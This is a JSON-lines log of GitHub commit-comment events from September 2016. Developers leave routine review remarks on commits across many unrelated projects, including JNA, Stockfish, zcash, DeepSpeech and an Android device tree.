{"id":"4536956611","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":18953924,"position":26,"line":24,"path":"ui/setup.jsx","commit_id":"91d14d20a839052727c55d52e6051c232f25c9e2","created_at":"2016-09-08T22:07:03Z","updated_at":"2016-09-08T22:07:03Z","body":"If you look at https://github.com/bkwsuper24/react-starter/blob/91d14d20a839052727c55d52e6051c232f25c9e2/ui/index.js \r\n\r\n    import App from './app';\r\n\r\n    setup.render(App);\r\n\r\nIn the current state of your application, `Component` is the component defined in `app.jsx`."}},"created_at":"2016-09-08T22:07:03Z"}
{"id":"4536958334","type":"CommitCommentEvent","actor":{"login":"NCrashed"},"repo":{"name":"lukexi/henet"},"payload":{"comment":{"id":18953929,"position":null,"line":null,"path":null,"commit_id":"a434a90fe73408c193418cb389aa2ff7ce77b2ae","created_at":"2016-09-08T22:07:26Z","updated_at":"2016-09-08T22:07:26Z","body":"Nice to see that my affords are reused!"}},"created_at":"2016-09-08T22:07:26Z"}
{"id":"4536959264","type":"CommitCommentEvent","actor":{"login":"lwahonen"},"repo":{"name":"java-native-access/jna"},"payload":{"comment":{"id":18953932,"position":null,"line":null,"path":null,"commit_id":"96869bb02df9fbffab35fb115a7e0c7757cb2668","created_at":"2016-09-08T22:07:40Z","updated_at":"2016-09-08T22:07:40Z","body":"+            while (User32.INSTANCE.GetMessage(msg, null, 0, 0) != 0) {\r\n\r\nMSDN tells us \r\n\r\n* If the function retrieves a message other than WM_QUIT, the return value is nonzero.\r\n* If the function retrieves the WM_QUIT message, the return value is zero.\r\n* **If there is an error, the return value is -1. For example, the function fails if hWnd is an invalid window handle or lpMsg is an invalid pointer. To get extended error information, call GetLastError.**\r\n\r\nWhat's the JNA policy w.r.t. error checking?"}},"created_at":"2016-09-08T22:07:40Z"}
{"id":"4536960551","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18953936,"position":null,"line":null,"path":null,"commit_id":"9730432380c29a3d9b0dafbce557ba70ed1ac1c9","created_at":"2016-09-08T22:07:58Z","updated_at":"2016-09-08T22:07:58Z","body":"@ilteroi,\r\n\r\nSince the latest change to the pathfinder (your 'reversal' of the check) I've noticed that automated units can sometimes lock up the 'next turn' button, disallowing you to move forward."}},"created_at":"2016-09-08T22:07:58Z"}
{"id":"4536960551","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18953936,"position":null,"line":null,"path":null,"commit_id":"9730432380c29a3d9b0dafbce557ba70ed1ac1c9","created_at":"2016-09-08T22:07:58Z","updated_at":"2016-09-08T22:07:58Z","body":"@ilteroi,\r\n\r\nSince the latest change to the pathfinder (your 'reversal' of the check) I've noticed that automated units can sometimes lock up the 'next turn' button, disallowing you to move forward."}},"created_at":"2016-09-08T22:07:58Z"}
{"id":"4536967431","type":"CommitCommentEvent","actor":{"login":"davidemiraglia"},"repo":{"name":"davidemiraglia/hello-world"},"payload":{"comment":{"id":18953945,"position":null,"line":null,"path":null,"commit_id":"94dbb8f4995b06341bf64194e73838a7f4dfa58d","created_at":"2016-09-08T22:09:29Z","updated_at":"2016-09-08T22:09:29Z","body":"aa"}},"created_at":"2016-09-08T22:09:29Z"}
{"id":"4536967967","type":"CommitCommentEvent","actor":{"login":"Spensaur-K"},"repo":{"name":"Devcord/cordlr"},"payload":{"comment":{"id":18953947,"position":null,"line":null,"path":null,"commit_id":"5e892a5471942fd4aad02d669b4de49e1e2d6a27","created_at":"2016-09-08T22:09:36Z","updated_at":"2016-09-08T22:09:36Z","body":"Sorry I meant to PR this but I didn't realize I had push access"}},"created_at":"2016-09-08T22:09:36Z"}
{"id":"4536968998","type":"CommitCommentEvent","actor":{"login":"davidemiraglia"},"repo":{"name":"davidemiraglia/hello-world"},"payload":{"comment":{"id":18953950,"position":3,"line":1,"path":"README.md","commit_id":"94dbb8f4995b06341bf64194e73838a7f4dfa58d","created_at":"2016-09-08T22:09:51Z","updated_at":"2016-09-08T22:09:51Z","body":"no"}},"created_at":"2016-09-08T22:09:51Z"}
{"id":"4536970158","type":"CommitCommentEvent","actor":{"login":"hugocf"},"repo":{"name":"hugocf/split-the-treasure"},"payload":{"comment":{"id":18953956,"position":7,"line":70,"path":"src/test/scala/SplitTreasureSpec.scala","commit_id":"d19442fd9e57c9547764cd430593278bc6751539","created_at":"2016-09-08T22:10:08Z","updated_at":"2016-09-08T22:10:08Z","body":"No need for this assertion. It isn’t mentioned in the README and is already covered elsewhere."}},"created_at":"2016-09-08T22:10:08Z"}
{"id":"4536972335","type":"CommitCommentEvent","actor":{"login":"hugocf"},"repo":{"name":"hugocf/split-the-treasure"},"payload":{"comment":{"id":18953959,"position":8,"line":71,"path":"src/test/scala/SplitTreasureSpec.scala","commit_id":"d19442fd9e57c9547764cd430593278bc6751539","created_at":"2016-09-08T22:10:39Z","updated_at":"2016-09-08T22:10:39Z","body":"ditto"}},"created_at":"2016-09-08T22:10:39Z"}
{"id":"4536978676","type":"CommitCommentEvent","actor":{"login":"binky123"},"repo":{"name":"binky123/Stockfish"},"payload":{"comment":{"id":18953980,"position":null,"line":null,"path":null,"commit_id":"c304f8103bb419c1e1baf911ef4efd331594f9ab","created_at":"2016-09-08T22:12:07Z","updated_at":"2016-09-08T22:12:07Z","body":"@tomtor yes, so the old statement was always false\r\n\r\nSo the test showed 0 elo results for not negating a reduction ply for captures under depth 8, so perhaps I could increase it."}},"created_at":"2016-09-08T22:12:07Z"}
{"id":"4536981894","type":"CommitCommentEvent","actor":{"login":"wizardozi"},"repo":{"name":"wizardozi/simplecodecasts_saas"},"payload":{"comment":{"id":18953995,"position":5,"line":7,"path":"Gemfile","commit_id":"8c5fce3b03838311e2e730a28a10678076503829","created_at":"2016-09-08T22:12:45Z","updated_at":"2016-09-08T22:12:45Z","body":"im totally sure why this isnt working but ill figure out "}},"created_at":"2016-09-08T22:12:45Z"}
{"id":"4536984011","type":"CommitCommentEvent","actor":{"login":"wizardozi"},"repo":{"name":"wizardozi/simplecodecasts_saas"},"payload":{"comment":{"id":18954002,"position":4,"line":10,"path":"app/views/layouts/application.html.erb","commit_id":"8c5fce3b03838311e2e730a28a10678076503829","created_at":"2016-09-08T22:13:15Z","updated_at":"2016-09-08T22:13:15Z","body":"im seeing an error here i gotta fix \r\n"}},"created_at":"2016-09-08T22:13:15Z"}
{"id":"4536985157","type":"CommitCommentEvent","actor":{"login":"Grarak"},"repo":{"name":"Grarak/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":18954003,"position":null,"line":null,"path":null,"commit_id":"fe47cd2d8ce59a19a5d033f4b77a6ad446190cad","created_at":"2016-09-08T22:13:31Z","updated_at":"2016-09-08T22:13:31Z","body":"flashlight works with the wrapper.\r\nvideo recording only works with google camera"}},"created_at":"2016-09-08T22:13:31Z"}
{"id":"4536985414","type":"CommitCommentEvent","actor":{"login":"hugocf"},"repo":{"name":"hugocf/split-the-treasure"},"payload":{"comment":{"id":18954005,"position":9,"line":72,"path":"src/test/scala/SplitTreasureSpec.scala","commit_id":"d19442fd9e57c9547764cd430593278bc6751539","created_at":"2016-09-08T22:13:36Z","updated_at":"2016-09-08T22:13:36Z","body":"We should add this assertion to respect the example expression “… can only be split between tow…”\r\n\r\n    splitGems(Seq(27, 7, 20), 3) shouldBe Seq.empty"}},"created_at":"2016-09-08T22:13:36Z"}
{"id":"4536985592","type":"CommitCommentEvent","actor":{"login":"jhaber"},"repo":{"name":"HubSpot/jdbi"},"payload":{"comment":{"id":18954006,"position":38,"line":71,"path":"src/main/java/org/skife/jdbi/v2/sqlobject/customizers/Define.java","commit_id":"8bac27504d1724869f01606302a1052d48cc9cb5","created_at":"2016-09-08T22:13:38Z","updated_at":"2016-09-08T22:13:38Z","body":"Since there can only be one statement locator on the query, I didn't want to blindly override it unless it's the default `ClasspathStatementLocator` (which we know won't work). If the query isn't using the default `ClasspathStatementLocator` I'm just assuming that it will handle the `@BindIn`/`@Define` properly. I don't think it's an issue we will run into in our code base and it sounds like this will work better in jdbi3 so I haven't spent too much time on it though. \r\n\r\nI tried to document the motivation in the PR description [here](https://github.com/jdbi/jdbi/pull/449#issue-170932064). The goal is to have `@BindIn` and `@Define` work out of the box, whereas right now they require the user to also annotate the class with `@UseStringTemplate3StatementLocator`, which then applies to the entire DAO, which then increases the chances of running into an escaping issue (last I checked the `StringTemplate3StatementLocator` still requires left brackets in the query to be escaped). I'd be happy to hear that some/all of this is no longer the case though :-D"}},"created_at":"2016-09-08T22:13:38Z"}
{"id":"4536986540","type":"CommitCommentEvent","actor":{"login":"mcmacker4"},"repo":{"name":"mcmacker4/UpGaming"},"payload":{"comment":{"id":18954007,"position":144,"line":307,"path":"js/upgaming.js","commit_id":"eaf8dd1780525e216eedb2d429d213c4f920df60","created_at":"2016-09-08T22:13:50Z","updated_at":"2016-09-08T22:13:50Z","body":"That should not be there. Sorry about that."}},"created_at":"2016-09-08T22:13:50Z"}
{"id":"4536993416","type":"CommitCommentEvent","actor":{"login":"manups4e"},"repo":{"name":"Grarak/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":18954030,"position":null,"line":null,"path":null,"commit_id":"fe47cd2d8ce59a19a5d033f4b77a6ad446190cad","created_at":"2016-09-08T22:15:24Z","updated_at":"2016-09-08T22:15:24Z","body":"uunderstood.. and what about the flashlight used outside of the camera app? i tried some codes but.. till now.. i wasn't able to turn on the leds outside camera.."}},"created_at":"2016-09-08T22:15:24Z"}
{"id":"4537005331","type":"CommitCommentEvent","actor":{"login":"Grarak"},"repo":{"name":"Grarak/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":18954071,"position":null,"line":null,"path":null,"commit_id":"fe47cd2d8ce59a19a5d033f4b77a6ad446190cad","created_at":"2016-09-08T22:18:14Z","updated_at":"2016-09-08T22:18:14Z","body":"As I said flashlight works with the wrapper"}},"created_at":"2016-09-08T22:18:14Z"}
{"id":"4537005542","type":"CommitCommentEvent","actor":{"login":"sgse"},"repo":{"name":"gigablue-support-org/templates_PiconsUpdater"},"payload":{"comment":{"id":18954073,"position":null,"line":null,"path":null,"commit_id":"f776b2461b459ff9b4dc11f27e558ef7d3e30769","created_at":"2016-09-08T22:18:16Z","updated_at":"2016-09-08T22:18:16Z","body":"Das ging ja fix, danke. :-)\r\nGruß, hier,  ;-)\r\nsgse "}},"created_at":"2016-09-08T22:18:16Z"}
{"id":"4537009063","type":"CommitCommentEvent","actor":{"login":"samaaron"},"repo":{"name":"samaaron/sonic-pi"},"payload":{"comment":{"id":18954082,"position":null,"line":null,"path":null,"commit_id":"1e797ac7fb72ed4eebf468bb2871e05a82cc9c76","created_at":"2016-09-08T22:19:10Z","updated_at":"2016-09-08T22:19:10Z","body":"It's possible it's not - might need Qt5 which isn't available on the Pi yet. \r\n\r\nThanks for bringing this to my attention - I'll look into it. I'll likely just remove this for `v2.11` :-)"}},"created_at":"2016-09-08T22:19:10Z"}
{"id":"4537017638","type":"CommitCommentEvent","actor":{"login":"jamesmbell"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":18954108,"position":null,"line":null,"path":null,"commit_id":"45847324a66ac53bb0c71d8c2b2c73436315997c","created_at":"2016-09-08T22:21:13Z","updated_at":"2016-09-08T22:21:13Z","body":"Good to know. I'll avoid committing permission modifications and related stuff in the future."}},"created_at":"2016-09-08T22:21:13Z"}
{"id":"4537017800","type":"CommitCommentEvent","actor":{"login":"manups4e"},"repo":{"name":"Grarak/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":18954109,"position":null,"line":null,"path":null,"commit_id":"fe47cd2d8ce59a19a5d033f4b77a6ad446190cad","created_at":"2016-09-08T22:21:14Z","updated_at":"2016-09-08T22:21:14Z","body":"understood ^^ thx for your kindness :)\n\n2016-09-09 0:18 GMT+02:00 Willi Ye <notifications@github.com>:\n\n> As I said flashlight works with the wrapper\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Grarak/android_device_oneplus_oneplus2/commit/fe47cd2d8ce59a19a5d033f4b77a6ad446190cad#commitcomment-18954071>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AD0ejn6DiBhMmEHxBSeqyhKKN5BjtV6iks5qoImngaJpZM4J4fCu>\n> .\n>\n"}},"created_at":"2016-09-08T22:21:14Z"}
{"id":"4537025568","type":"CommitCommentEvent","actor":{"login":"ozairi121"},"repo":{"name":"ozairi121/Team-Store"},"payload":{"comment":{"id":18954128,"position":4,"line":3,"path":"index.html","commit_id":"2b460f9518467ef4ccdd5c6d023b1f851f001729","created_at":"2016-09-08T22:23:01Z","updated_at":"2016-09-08T22:23:01Z","body":"padding"}},"created_at":"2016-09-08T22:23:01Z"}
{"id":"4537027558","type":"CommitCommentEvent","actor":{"login":"shineangelic"},"repo":{"name":"shineangelic/MobAnd01"},"payload":{"comment":{"id":18954132,"position":null,"line":null,"path":null,"commit_id":"157847f44ebcb3fd7cb9c3c4a7cad6346b1030a3","created_at":"2016-09-08T22:23:29Z","updated_at":"2016-09-08T22:23:29Z","body":"textSize dovrebbero essere specificati in sp, per essere scalati con le pref utente"}},"created_at":"2016-09-08T22:23:29Z"}
{"id":"4537030972","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18954143,"position":null,"line":null,"path":null,"commit_id":"4d35b4442e6218f2937e9feb938ec92a7dec1e3b","created_at":"2016-09-08T22:24:16Z","updated_at":"2016-09-08T22:24:16Z","body":"@Sami32 I'm not sure it's useful to just paste code comments in the configuration file. References to constructors and classes isn't relevant for users, and tbh not all of the above makes sense to me."}},"created_at":"2016-09-08T22:24:16Z"}
{"id":"4537031216","type":"CommitCommentEvent","actor":{"login":"ArekZc"},"repo":{"name":"ArekZc/node-practice"},"payload":{"comment":{"id":18954145,"position":null,"line":null,"path":null,"commit_id":"2760cef34ea915042f82e22a17abc1ca34d8fc4a","created_at":"2016-09-08T22:24:20Z","updated_at":"2016-09-08T22:24:20Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;IIbsi5td&#x2F;21-add-typescript-decorators-for-express\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add typescript decorators for express</a>"}},"created_at":"2016-09-08T22:24:20Z"}
{"id":"4537034814","type":"CommitCommentEvent","actor":{"login":"bokatan"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18954162,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-08T22:25:11Z","updated_at":"2016-09-08T22:25:11Z","body":"This: \r\n\r\n\"You also agree that you will respect the intellectual property rights of\r\n     others, and represent and warrant that you have all of the necessary rights\r\n     to grant us this license for all Subscriber Content you transfer to us.\"\r\n\r\nFan art legally is not intellectual property from already copyrighted material of the TV show or movie. Your members claim way too much IP rights for copyrights they do not own. You may want to correct that legally before you get sued by the original IP copyright holder, like Disney, Marvel, DC Comics, et al., etc. \r\n\r\nYou need to work on that because you threatened to delete my account for sharing it from another social media platform."}},"created_at":"2016-09-08T22:25:11Z"}
{"id":"4537036013","type":"CommitCommentEvent","actor":{"login":"tegularius"},"repo":{"name":"tegularius/sch_cake"},"payload":{"comment":{"id":18954168,"position":null,"line":null,"path":null,"commit_id":"2f3c308faec499069959b4489e5a724a7d3b82f3","created_at":"2016-09-08T22:25:27Z","updated_at":"2016-09-08T22:25:27Z","body":"I am not sure about the pre-4.2 support, on 4.7.2 it worked. It's always on for now and replaces both source/destination, addresses and ports. Based on cls_flow, which I would like to use instead."}},"created_at":"2016-09-08T22:25:27Z"}
{"id":"4537039617","type":"CommitCommentEvent","actor":{"login":"overheatua"},"repo":{"name":"Nezdara/sedona_adaptive"},"payload":{"comment":{"id":18954194,"position":34,"line":34,"path":"comments.html","commit_id":"884dc721b24df45e050e4a5a00f7d8d88e8d6ca3","created_at":"2016-09-08T22:26:18Z","updated_at":"2016-09-08T22:26:18Z","body":"в формах лучше использовать теги `<fieldset>` и `<legend>`"}},"created_at":"2016-09-08T22:26:18Z"}
{"id":"4537041302","type":"CommitCommentEvent","actor":{"login":"BogdanZavu"},"repo":{"name":"BogdanZavu/DynamoRevit"},"payload":{"comment":{"id":18954203,"position":17,"line":82,"path":"src/Legacy/DynamoRevitVersionSelector/VersionSelectorApp.cs","commit_id":"09e88031829aafdb034ad1fb8302959dacffd42c","created_at":"2016-09-08T22:26:42Z","updated_at":"2016-09-08T22:26:42Z","body":"@mjkkirschner , if it's not too late , I would like to integrate this small change . \r\nI moved the Revit restriction into DynamoRevitAddtions.dll so I don't have to update the code here in the future . I understood the \"versionNumber\" format will change soon and I figured we have more flexibility if we do the check there.\r\nAlso I realized that ConvertToInt might crash if revitVersion is not number - e.g in the future becomes something like \"2017.1.0\" . \r\nIf you think this invalidates testing made so far for 1.2 we leave it like this.\r\nIf not I'll create pull requests for all the branches."}},"created_at":"2016-09-08T22:26:42Z"}
{"id":"4537042500","type":"CommitCommentEvent","actor":{"login":"fjarrett"},"repo":{"name":"godaddy/wp-primer-theme"},"payload":{"comment":{"id":18954209,"position":14,"line":109,"path":"inc/hooks.php","commit_id":"86ab0394ca3e3e82f73e7b74acd3062564ed8ac3","created_at":"2016-09-08T22:27:01Z","updated_at":"2016-09-08T22:27:01Z","body":"Could not for the life of me understand why post meta was no longer appearing. Finally found this and fixed in https://github.com/godaddy/wp-primer-theme/commit/afb18ffe6984a6c1c71fc42883266585ff392a34 😸 "}},"created_at":"2016-09-08T22:27:01Z"}
{"id":"4537054971","type":"CommitCommentEvent","actor":{"login":"daira"},"repo":{"name":"zcash/zcash"},"payload":{"comment":{"id":18954270,"position":29,"line":152,"path":"src/wallet/asyncrpcoperation_sendmany.cpp","commit_id":"0fce02d0b8f092770300754068273704107d7c85","created_at":"2016-09-08T22:30:02Z","updated_at":"2016-09-08T22:30:02Z","body":"Let's make sure we have tests for all of these cases."}},"created_at":"2016-09-08T22:30:02Z"}
{"id":"4537056591","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18954282,"position":null,"line":null,"path":null,"commit_id":"2ffeccae84191b47fe7cc376502d6d02fa4e9708","created_at":"2016-09-08T22:30:23Z","updated_at":"2016-09-08T22:30:23Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2364 of 2366 tests passed, 24 test warnings)\n\n * 5 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR big diffs.\n * 2 tests had: Table big diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.92%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T22:30:23Z"}
{"id":"4537057381","type":"CommitCommentEvent","actor":{"login":"rylarson"},"repo":{"name":"crohr/pkgr"},"payload":{"comment":{"id":18954283,"position":15,"line":85,"path":"lib/pkgr/config.rb","commit_id":"a0cc100b1b2e4fb0e96cfa1e84fdb4af6cf29c6d","created_at":"2016-09-08T22:30:33Z","updated_at":"2016-09-08T22:30:33Z","body":"This actually has broken the `default_dependencies: false` method in the config file. The command line option has a default value, so it is never nil"}},"created_at":"2016-09-08T22:30:33Z"}
{"id":"4537062673","type":"CommitCommentEvent","actor":{"login":"mlubin"},"repo":{"name":"mlubin/Pajarito.jl"},"payload":{"comment":{"id":18954296,"position":48,"line":674,"path":"src/conic_algorithm.jl","commit_id":"12ce88f6caf0cc23a24484fa91a37fc228c111ed","created_at":"2016-09-08T22:31:54Z","updated_at":"2016-09-08T22:31:54Z","body":"What's with all this commented code?"}},"created_at":"2016-09-08T22:31:54Z"}
{"id":"4537063636","type":"CommitCommentEvent","actor":{"login":"mlubin"},"repo":{"name":"mlubin/Pajarito.jl"},"payload":{"comment":{"id":18954299,"position":27,"line":50,"path":"src/solver.jl","commit_id":"12ce88f6caf0cc23a24484fa91a37fc228c111ed","created_at":"2016-09-08T22:32:09Z","updated_at":"2016-09-08T22:32:09Z","body":"Why adjusting default options?"}},"created_at":"2016-09-08T22:32:09Z"}
{"id":"4537064301","type":"CommitCommentEvent","actor":{"login":"mlubin"},"repo":{"name":"mlubin/Pajarito.jl"},"payload":{"comment":{"id":18954301,"position":27,"line":50,"path":"src/solver.jl","commit_id":"12ce88f6caf0cc23a24484fa91a37fc228c111ed","created_at":"2016-09-08T22:32:17Z","updated_at":"2016-09-08T22:32:17Z","body":"There shouldn't be a timeout by default"}},"created_at":"2016-09-08T22:32:17Z"}
{"id":"4537065825","type":"CommitCommentEvent","actor":{"login":"wnwnzhou"},"repo":{"name":"angular/material"},"payload":{"comment":{"id":18954307,"position":null,"line":null,"path":null,"commit_id":"314aae1c345635f3ec1f67c842a38e19ee49b01e","created_at":"2016-09-08T22:32:39Z","updated_at":"2016-09-08T22:32:39Z","body":"Hi robertmesserle, can I know what is the reason to add ariaHidden to the md-chips directive? I found it causes the content inside md-chips cannot be announced by the screenreader.  #9556"}},"created_at":"2016-09-08T22:32:39Z"}
{"id":"4537067073","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"FabricMC/pomf"},"payload":{"comment":{"id":18954309,"position":5,"line":52,"path":"mappings/net/minecraft/block/tile/impl/TileEntityBeacon.mapping","commit_id":"142673563603631d9775cbdafb01660c89afcf98","created_at":"2016-09-08T22:33:00Z","updated_at":"2016-09-08T22:33:00Z","body":"Well these methods' names became longer. Could they be shortened?"}},"created_at":"2016-09-08T22:33:00Z"}
{"id":"4537069688","type":"CommitCommentEvent","actor":{"login":"JakeWharton"},"repo":{"name":"ReactiveX/RxJava"},"payload":{"comment":{"id":18954316,"position":null,"line":null,"path":null,"commit_id":"1145819b658983807e0cede5ba2c7d5ac1117baa","created_at":"2016-09-08T22:33:38Z","updated_at":"2016-09-08T22:33:38Z","body":":+1:"}},"created_at":"2016-09-08T22:33:38Z"}
{"id":"4537071185","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"CovertJaguar/Railcraft"},"payload":{"comment":{"id":18954322,"position":5,"line":44,"path":"README.md","commit_id":"8d1ecd7e44bda790c4b38b5a1002957f9c25472f","created_at":"2016-09-08T22:34:02Z","updated_at":"2016-09-08T22:34:02Z","body":"Well you has not tagged 'merged into dev' fro a long time."}},"created_at":"2016-09-08T22:34:02Z"}
{"id":"4537076255","type":"CommitCommentEvent","actor":{"login":"ffont"},"repo":{"name":"ffont/freesound-explorer"},"payload":{"comment":{"id":18954331,"position":5,"line":50,"path":"static/src/actions/midi.js","commit_id":"6ce1a816afee3fefe18f7dcad948b7d8314e5d00","created_at":"2016-09-08T22:35:18Z","updated_at":"2016-09-08T22:35:18Z","body":"You're right!"}},"created_at":"2016-09-08T22:35:18Z"}
{"id":"4537076989","type":"CommitCommentEvent","actor":{"login":"snuggs"},"repo":{"name":"TrySound/rollup-plugin-eslint"},"payload":{"comment":{"id":18954332,"position":null,"line":null,"path":null,"commit_id":"b46eba4299f4c75c3dd688899d0ed2e9e1a50258","created_at":"2016-09-08T22:35:29Z","updated_at":"2016-09-08T22:35:29Z","body":"#WOOT @TrySound 🎉 "}},"created_at":"2016-09-08T22:35:29Z"}
{"id":"4537081223","type":"CommitCommentEvent","actor":{"login":"shineangelic"},"repo":{"name":"shineangelic/MobAnd01"},"payload":{"comment":{"id":18954340,"position":null,"line":null,"path":null,"commit_id":"ce704067cc570fb6b1609f5538fe32aa239adb1b","created_at":"2016-09-08T22:36:36Z","updated_at":"2016-09-08T22:36:36Z","body":"ho spostato la barra di ricerca più in basso, ma non funziona..."}},"created_at":"2016-09-08T22:36:36Z"}
{"id":"4537086549","type":"CommitCommentEvent","actor":{"login":"kdavis-mozilla"},"repo":{"name":"lissyx/DeepSpeech"},"payload":{"comment":{"id":18954367,"position":42,"line":42,"path":"deepspeech.py","commit_id":"c0ab660b38129a7bb10f85b7d730b0605d90c94a","created_at":"2016-09-08T22:37:56Z","updated_at":"2016-09-08T22:37:56Z","body":"Why commented out?"}},"created_at":"2016-09-08T22:37:56Z"}
{"id":"4537087322","type":"CommitCommentEvent","actor":{"login":"snuggs"},"repo":{"name":"TrySound/rollup-plugin-eslint"},"payload":{"comment":{"id":18954371,"position":4,"line":3,"path":"rollup.config.js","commit_id":"b46eba4299f4c75c3dd688899d0ed2e9e1a50258","created_at":"2016-09-08T22:38:09Z","updated_at":"2016-09-08T22:38:09Z","body":"@TrySound just curious.\r\n\r\n![image](https://cloud.githubusercontent.com/assets/38223/18369380/622066e8-75f3-11e6-937b-e598baba31e5.png)\r\n"}},"created_at":"2016-09-08T22:38:09Z"}
{"id":"4537088640","type":"CommitCommentEvent","actor":{"login":"shadowfacts"},"repo":{"name":"FabricMC/pomf"},"payload":{"comment":{"id":18954378,"position":5,"line":52,"path":"mappings/net/minecraft/block/tile/impl/TileEntityBeacon.mapping","commit_id":"142673563603631d9775cbdafb01660c89afcf98","created_at":"2016-09-08T22:38:28Z","updated_at":"2016-09-08T22:38:28Z","body":"IMO, length doesn't matter and `amount` is simpler than `stackSize`."}},"created_at":"2016-09-08T22:38:28Z"}
{"id":"4537089893","type":"CommitCommentEvent","actor":{"login":"isysd"},"repo":{"name":"f3rnando/gitguild_whitepaper_data"},"payload":{"comment":{"id":18954382,"position":null,"line":null,"path":null,"commit_id":"ce1c62a327a8c9fc92ea8fe65a574791c965395b","created_at":"2016-09-08T22:38:48Z","updated_at":"2016-09-08T22:38:48Z","body":"It is certainly my fault for not sharing a key sharing mechanism, but would you please point me toward your public key? I need to verify the signature is the same as the fingerprint here. :+1: "}},"created_at":"2016-09-08T22:38:48Z"}
{"id":"4537090396","type":"CommitCommentEvent","actor":{"login":"kdavis-mozilla"},"repo":{"name":"lissyx/DeepSpeech"},"payload":{"comment":{"id":18954385,"position":56,"line":56,"path":"deepspeech.py","commit_id":"c0ab660b38129a7bb10f85b7d730b0605d90c94a","created_at":"2016-09-08T22:38:55Z","updated_at":"2016-09-08T22:38:55Z","body":"Should be determined programatically from the longest speech sample"}},"created_at":"2016-09-08T22:38:55Z"}
{"id":"4537091527","type":"CommitCommentEvent","actor":{"login":"kdavis-mozilla"},"repo":{"name":"lissyx/DeepSpeech"},"payload":{"comment":{"id":18954388,"position":61,"line":61,"path":"deepspeech.py","commit_id":"c0ab660b38129a7bb10f85b7d730b0605d90c94a","created_at":"2016-09-08T22:39:13Z","updated_at":"2016-09-08T22:39:13Z","body":"Why commented out?"}},"created_at":"2016-09-08T22:39:13Z"}
{"id":"4537092288","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.drafts"},"payload":{"comment":{"id":18954391,"position":null,"line":null,"path":null,"commit_id":"329168990e098a2e13625552857a896414fcf664","created_at":"2016-09-08T22:39:24Z","updated_at":"2016-09-08T22:39:24Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.drafts/20/violations\n```\nplone/app/drafts/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/app/drafts/dexterity.py:152:9: T001 print statement found.\nplone/app/drafts/dexterity.py:152:15: Q000 Remove bad quotes.\nplone/app/drafts/tests.py:1135:15: S001 found % formatter\nplone/app/drafts/tests.py:1175:15: S001 found % formatter\nplone/app/drafts/tests.py:1222:13: P101 format string does contain unindexed parameters\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-08T22:39:24Z"}
{"id":"4537092544","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"FabricMC/pomf"},"payload":{"comment":{"id":18954393,"position":5,"line":52,"path":"mappings/net/minecraft/block/tile/impl/TileEntityBeacon.mapping","commit_id":"142673563603631d9775cbdafb01660c89afcf98","created_at":"2016-09-08T22:39:28Z","updated_at":"2016-09-08T22:39:28Z","body":"Can these just be `getMaxStackAmount`?"}},"created_at":"2016-09-08T22:39:28Z"}
{"id":"4537094734","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"binky123/Stockfish"},"payload":{"comment":{"id":18954401,"position":null,"line":null,"path":null,"commit_id":"702e898b14dbf8d84bb4b5fb2ec1b7a8b02ca755","created_at":"2016-09-08T22:40:01Z","updated_at":"2016-09-08T22:40:01Z","body":"The move stats are for quiet moves only...we don't have stats for captures."}},"created_at":"2016-09-08T22:40:01Z"}
